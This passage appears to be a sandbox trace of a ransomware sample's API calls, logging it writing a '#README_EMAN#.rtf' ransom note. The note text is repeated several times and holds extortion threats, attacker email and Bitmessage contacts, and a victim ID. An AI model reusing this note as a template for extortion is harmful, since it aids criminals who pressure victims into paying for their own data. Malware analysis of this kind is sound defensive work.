R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nêpñ\x03]Ä\x0bõ5B\x18,", lpUsedDefaultChar=0x0) returned 8717 [0269.083] WriteFile (in: hFile=0x294, lpBuffer=0x24607d8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24607d8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0269.084] CloseHandle (hObject=0x294) returned 1 [0269.084] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\#readme_eman#.rtf")) returned 0xffffffff [0269.084] GetLastError () returned 0x2 [0269.084] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\ClickToRun\\8C296B8E-6699-457C-9415-3D0647E1D775\\x-none.16\\#README_EMAN#.rtf" (normalized: "c:\\users\\all users\\microsoft\\clicktorun\\8c296b8e-6699-457c-9415-3d0647e1d775\\x-none.16\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0269.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.084] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0269.085] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x24607d8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d 